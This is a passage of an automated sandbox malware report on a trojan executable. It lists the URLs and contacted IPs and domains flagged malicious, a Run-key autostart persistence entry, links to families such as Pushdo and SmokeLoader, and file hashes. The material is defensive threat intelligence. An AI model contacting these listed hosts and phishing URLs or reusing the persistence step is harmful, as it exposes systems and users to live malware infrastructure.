https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.elpro.si/kategorija-izdelka/rotronic/	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg	6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elpro.si/wp-includes/js/jquery/ui/resizable.min.js?ver=1.13.2	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.218.26	unknown	United States	15169	GOOGLEUS	false
104.26.7.17	unknown	United States	13335	CLOUDFLARENETUS	true
217.69.139.150	mxs.mail.ru	Russian Federation	47764	MAILRU-ASMailRuRU	true
198.49.23.145	unknown	United States	53831	SQUARESPACEUS	true
76.74.184.61	alexpope.biz	Canada	13768	COGECO-PEER1CA	true
107.180.58.31	orbitgas.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
142.251.31.26	gmail-smtp-in.l.google.com	United States	15169	GOOGLEUS	false
203.137.75.45	okashimo.com	Japan	4694	IDCFIDCFrontierIncJP	true
172.67.152.159	www.tvtools.fi	United States	13335	CLOUDFLARENETUS	false
142.251.31.27	unknown	United States	15169	GOOGLEUS	false
153.126.211.112	mikihan.com	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
217.160.0.131	mackusick.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
203.210.102.34	ascc.org.au	Australia	7496	WEBCENTRAL-ASWebCentralAU	true
5.189.171.125	muhr-soehne.de	Germany	51167	CONTABODE	true
198.49.23.144	riwn.org	United States	53831	SQUARESPACEUS	true
194.143.194.23	reproar.com	Spain	8311	REDESTELRedestel-RedesdigitalesdeTelecomunicacionenI	true
83.223.113.46	dataform.co.uk	United Kingdom	29017	GYRONGB	true
157.112.187.75	cjcagent.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
91.229.22.126	pleszew.policja.gov.pl	Poland	198704	CSD-KGP-PL-ASBiuroLacznosciiInformatykiPL	true
172.67.165.62	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.65.224	hyab.com	United States	13335	CLOUDFLARENETUS	true
217.74.161.133	cnti.krsn.ru	Russian Federation	16300	INTERTAX-AREARU	true
13.248.169.48	onzcda.com	United States	16509	AMAZON-02US	true
85.128.196.22	strazynski.pl	Poland	15967	NAZWAPL	true
202.254.236.40	www.naoi-a.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	false
173.194.202.26	alt4.gmail-smtp-in.l.google.com	United States	15169	GOOGLEUS	false
81.2.194.241	www.edimart.hu	Czech Republic	24806	INTERNET-CZKtis238403KtisCZ	false
37.59.243.164	aluminox.es	France	16276	OVHFR	true
217.19.254.22	shanks.co.uk	United Kingdom	60819	SAFENAMES-ASGB	true
35.186.238.101	gcss.com	United States	15169	GOOGLEUS	false
185.163.45.187	softizer.com	Moldova Republic of	39798	MIVOCLOUDMD	true
216.177.137.32	fortknox.bm	United States	395532	1P-WSSUS	true
109.71.54.22	akdeniz.nl	Netherlands	202053	UPCLOUDFI	true
219.94.129.97	web-york.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
49.212.232.113	unicus.jp	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
74.208.215.145	indonesiamedia.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
104.21.89.126	kavram.com	United States	13335	CLOUDFLARENETUS	true
104.21.30.14	cubodown.com	United States	13335	CLOUDFLARENETUS	true
49.12.155.123	adventist.ro	Germany	24940	HETZNER-ASDE	true
54.36.175.146	biurohera.pl	France	16276	OVHFR	true
104.26.10.81	www.com-sit.com	United States	13335	CLOUDFLARENETUS	false
46.30.60.158	ncn.de	Germany	15817	MITTWALD-ASMittwaldCMServiceGmbHundCoKGDE	true
104.21.23.9	unknown	United States	13335	CLOUDFLARENETUS	false
78.46.224.133	amic.at	Germany	24940	HETZNER-ASDE	true
77.78.104.3	zupraha.cz	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
49.212.180.178	kumaden.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
88.86.118.82	deckoviny.cz	Czech Republic	39392	SUPERNETWORK_CZ	true
192.99.226.184	s5w.com	Canada	16276	OVHFR	true
195.78.66.50	www.photo4b.com	Poland	41079	SUPERHOST-PL-ASPL	false
97.74.42.79	sanfotek.net	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
137.118.26.67	fnw.us	United States	6250	NEONOVA-NETUS	true
188.166.152.188	www.c9dd.com	Netherlands	14061	DIGITALOCEAN-ASNUS	false
15.204.18.132	15.204.18.132.datacname.com	United States	71	HP-INTERNET-ASUS	true
185.253.212.22	karmy.com.pl	Poland	48707	GREENER-ASPL	true
210.140.73.39	at-shun.com	Japan	4694	IDCFIDCFrontierIncJP	true
89.221.250.3	rast.se	Sweden	1257	TELE2EU	true
31.177.80.70	kursavto.ru	Russian Federation	48287	RU-CENTERRU	true
70.39.251.249	quadlock.com	United States	54641	INMOTI-1US	false
104.26.7.221	unknown	United States	13335	CLOUDFLARENETUS	false
62.75.216.137	www.tyrns.com	Germany	8972	GD-EMEA-DC-SXB1DE	true
213.142.131.159	pcoyuncu.com	Turkey	397563	ADEOXTECHUS	true
203.0.113.0	nme.co.jp	Reserved	136518	WA-GOVERNMENT-AS-APWAGovernmentprojectAU	true
208.100.26.245	atb-lit.com	United States	32748	STEADFASTUS	true
185.230.63.186	sokuwan.net	Israel	58182	WIX_COMIL	true
51.159.3.117	ossir.org	France	12876	OnlineSASFR	true
82.201.61.230	www.nelipak.nl	Netherlands	15879	KPN-INTERNEDSERVICESNL	false
66.111.4.72	unknown	United States	11403	NYINTERNETUS	true
79.124.76.247	mkm-gr.com	Bulgaria	31083	TELEPOINTBG	true
172.67.71.13	jabian.com	United States	13335	CLOUDFLARENETUS	true
192.124.249.3	pers.com	United States	30148	SUCURI-SECUS	true
46.19.218.80	mcseurope.nl	Netherlands	20559	FUNDAMENTS-ASNL	true
34.102.136.180	hamaker.net	United States	15169	GOOGLEUS	false
52.71.57.184	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
13.248.216.40	www.findbc.com	United States	16509	AMAZON-02US	false
192.241.158.94	nunomira.com	United States	14061	DIGITALOCEAN-ASNUS	false
172.67.164.178	unknown	United States	13335	CLOUDFLARENETUS	true
63.251.106.25	kewlmail.com	United States	29791	VOXEL-DOT-NETUS	true
195.96.252.188	nlcv.bas.bg	Bulgaria	8745	AS-BG-BASBG	true
212.44.102.57	oozkranj.com	Slovenia	43128	DHH-ASSI	true
164.132.175.106	zemarmot.net	France	16276	OVHFR	true
95.174.22.233	snf.it	Italy	12637	SEEWEBWebhostingcolocationandcloudservicesIT	true
104.21.79.166	simetar.com	United States	13335	CLOUDFLARENETUS	true
104.164.117.233	arowines.com	United States	18779	EGIHOSTINGUS	true
165.227.252.190	crcsi.org	United States	14061	DIGITALOCEAN-ASNUS	false
185.151.30.147	pertex.com	United Kingdom	48254	TWENTYIGB	true
199.34.228.78	ftmobile.com	United States	27647	WEEBLYUS	true
54.248.94.67	unknown	United States	16509	AMAZON-02US	true
198.185.159.144	captlfix.com	United States	53831	SQUARESPACEUS	true
211.13.196.162	unknown	Japan	7514	MEXComputerEngineeringConsultingLtdJP	true
54.236.92.93	cdl-lb-1356093980.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
141.193.213.20	johnlyon.org	United States	396845	DV-PRIMARY-ASN1US	true
35.172.94.1	themark.org	United States	14618	AMAZON-AESUS	true
195.128.140.29	nettle.pl	Poland	56590	RBO-NETPL	true
104.20.54.214	bible.org	United States	13335	CLOUDFLARENETUS	false
76.223.35.103	nrsi.com	United States	16509	AMAZON-02US	true
159.89.244.183	tcpoa.com	United States	14061	DIGITALOCEAN-ASNUS	true
69.163.239.62	sjbs.org	United States	26347	DREAMHOST-ASUS	false
38.111.255.201	wnit.org	United States	62550	INOVADATAUS	true
66.94.119.160	www.yocinc.org	United States	394513	AWESOMENET-CORPUS	false
204.11.56.48	impexnc.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	831928
Start date and time:	2023-03-22 05:42:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	6gjnnBAbpc.exe
Original Sample Name:	9faea65cff61ad64e4bc4c3913c336be.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@37/4@2693/100
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 35.9% (good quality ratio 32.1%) Quality average: 79% Quality standard deviation: 34.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 136 Number of non-executed functions: 130
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.67.142.169, 104.21.63.28, 204.79.197.212
Excluded domains from analysis (whitelisted): www.ottospm.com.cdn.cloudflare.net, ctldl.windowsupdate.com, a-0010.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:43:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
05:43:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
05:43:59	API Interceptor	2x Sleep call for process: 6gjnnBAbpc.exe modified
05:44:18	API Interceptor	4x Sleep call for process: pigalicapi.exe modified
05:45:05	API Interceptor	3x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.26.7.17	rLDmqbpt5D.exe	Get hash	malicious	Pushdo, DanaBot, RedLine, SmokeLoader	Browse
	d4bNCWDk1F.exe	Get hash	malicious	Pushdo	Browse
	MYorfmVq9Z.exe	Get hash	malicious	Pushdo	Browse
	z2xQEFs54b.exe	Get hash	malicious	HTMLPhisher	Browse
	990109.exe	Get hash	malicious	HTMLPhisher	Browse
	https://nenalandia-tv.blogspot.com/2012/09/alejandra-alloza-28092012.html?rndad=1476455992-1578670554	Get hash	malicious	Audio Phisher	Browse
	ze99HWZnJK.exe	Get hash	malicious	Unknown	Browse
217.69.139.150	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	iJzpyjAehB.exe	Get hash	malicious	Pushdo	Browse
	EksRd2mRLH.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse
	rLDmqbpt5D.exe	Get hash	malicious	Pushdo, DanaBot, RedLine, SmokeLoader	Browse
	d4bNCWDk1F.exe	Get hash	malicious	Pushdo	Browse
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse
	file.exe	Get hash	malicious	Tofsee	Browse
	MYorfmVq9Z.exe	Get hash	malicious	Pushdo	Browse
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse
	l3Qj8QhTYZ.exe	Get hash	malicious	Phorpiex	Browse
	nwk9iV8lpS.exe	Get hash	malicious	Unknown	Browse
	3ts2As2Bkm.exe	Get hash	malicious	Unknown	Browse
	ydbWyoxHsd.exe	Get hash	malicious	Unknown	Browse
	ZBfaaLcshZ.exe	Get hash	malicious	Pushdo	Browse
	Readme.exe	Get hash	malicious	Unknown	Browse
	jByRaPZ2js.exe	Get hash	malicious	Unknown	Browse
	TLURH6Og6c.exe	Get hash	malicious	Pushdo	Browse
	A5VY5aB4rk.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
invictus.pl	EksRd2mRLH.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	193.107.88.74
	d4bNCWDk1F.exe	Get hash	malicious	Pushdo	Browse	193.107.88.74
	MYorfmVq9Z.exe	Get hash	malicious	Pushdo	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	193.107.88.74
	lCVLEXbxih.exe	Get hash	malicious	Pushdo, DCRat, SmokeLoader	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader, SystemBC	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, SmokeLoader, SystemBC	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, SmokeLoader, SystemBC	Browse	193.107.88.74
	icKRjsDL47.exe	Get hash	malicious	Pushdo, SmokeLoader, SystemBC	Browse	193.107.88.74
	h9Gwq0fYVO.exe	Get hash	malicious	Pushdo, SmokeLoader	Browse	193.107.88.74
	nwk9iV8lpS.exe	Get hash	malicious	Unknown	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, SmokeLoader	Browse	193.107.88.74
	3ts2As2Bkm.exe	Get hash	malicious	Unknown	Browse	193.107.88.74
	0fmEh2zmDj.exe	Get hash	malicious	Pushdo	Browse	193.107.88.74
	ZBfaaLcshZ.exe	Get hash	malicious	Pushdo	Browse	193.107.88.74
	jByRaPZ2js.exe	Get hash	malicious	Unknown	Browse	193.107.88.74
	TLURH6Og6c.exe	Get hash	malicious	Pushdo	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, SmokeLoader	Browse	193.107.88.74
	file.exe	Get hash	malicious	Pushdo, SmokeLoader	Browse	193.107.88.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://go.onelink.me/107872968?pid=InProduct&c=Global_Internal_YGrowth_AndroidEmailSig__AndroidUsers&af_wl=ym&af_sub1=Internal&af_sub2=Global_YGrowth&af_sub3=EmailSignature&af_web_dp=https://iknas.com/tinny/zhkjuq%2F%2F%2Fcontact@automationanywhere.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	CapCut Pro.exe	Get hash	malicious	Unknown	Browse	104.21.26.29
	http://app.adjust.com/izw3imq?redirect=https://goodlookmke.com/mtp/auth/keulx/robert.katz@globalfoundries.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	setup.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Djvu, ManusCrypt, RHADAMANTHYS, SmokeLoader	Browse	172.67.181.144
	setup.exe	Get hash	malicious	Amadey, Djvu, Laplas Clipper, RHADAMANTHYS, SmokeLoader	Browse	188.114.96.7
	setup.exe	Get hash	malicious	Amadey, Djvu, RHADAMANTHYS, SmokeLoader	Browse	188.114.97.7
	setup.exe	Get hash	malicious	Xmrig	Browse	104.20.68.143
	https://www.archons.org/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.dementia.org//azimute.historia.ufrj.br/TGS/aXz/	Get hash	malicious	Unknown	Browse	104.18.16.182
	#U260e#U25b6#Ufe0f2min58secMSG00661.WAV.HTM	Get hash	malicious	Unknown	Browse	104.16.123.96
	jfukuma Benefit Guide.shtml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.dropbox.com/scl/fi/297zopyv0dxgkvr1ibuf9/Check-below-for-the-vital-document-shared..paper?dl=0&rlkey=isgzf4v6lg6cielazaf2x32rh	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Citation Healthcare Labels_Resource_Pol2684Guidelines_and_Initialing Instructions__200323.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://fluttercomman.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	ATT42345678.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Invoice INV-6830.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://www.archons.org/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.dementia.org//metodoatalhomilionario.com.br/Xz1/serv/system/	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://www.archons.org/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.dementia.org//metodoatalhomilionario.com.br/Xz1/serv/system/	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://xn--80aafbgrk0ao1a4e.xn--p1ai/e-doc.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://xn--80aafbgrk0ao1a4e.xn--p1ai/e-doc.html	Get hash	malicious	HTMLPhisher	Browse	172.64.168.22
	https://5oxxdb3rirxzyedmrxdiihlwyfzx5eyyan3wchh4h4p6ne3e-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeigv64&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#syaklin@noch.org	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	_______woff.js	Get hash	malicious	Grandcrab, Gandcrab, ReflectiveLoader	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	information_21_mar-7065132.js	Get hash	malicious	NetSupport RAT	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	information_21_mar-7065132.js	Get hash	malicious	NetSupport RAT	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	lsOF.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	lsOF.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	Dolorem.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	Dolorem.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	siG.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	siG.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	Statment_493605426.JS.js	Get hash	malicious	AsyncRAT	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	NNE70093-3411.vbs	Get hash	malicious	AgentTesla	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	14DQLvW18s.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	omnis.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	omnis.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	information_20_mar.js	Get hash	malicious	NetSupport RAT	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	information_20_mar.js	Get hash	malicious	NetSupport RAT	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178
	bV.js	Get hash	malicious	Unknown	Browse	172.67.156.49 188.114.97.3 5.189.171.125 185.237.66.112 188.114.96.3 91.229.22.126 172.67.164.178

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\pigalicapi.exe	mj3Lf2ulDf.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\6gjnnBAbpc.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\c5d8393293ce2ba62f117b2c2d55bc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\6gjnnBAbpc.exe
File Type:	Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
Category:	modified
Size (bytes):	1446
Entropy (8bit):	7.416007513142872
Encrypted:	false
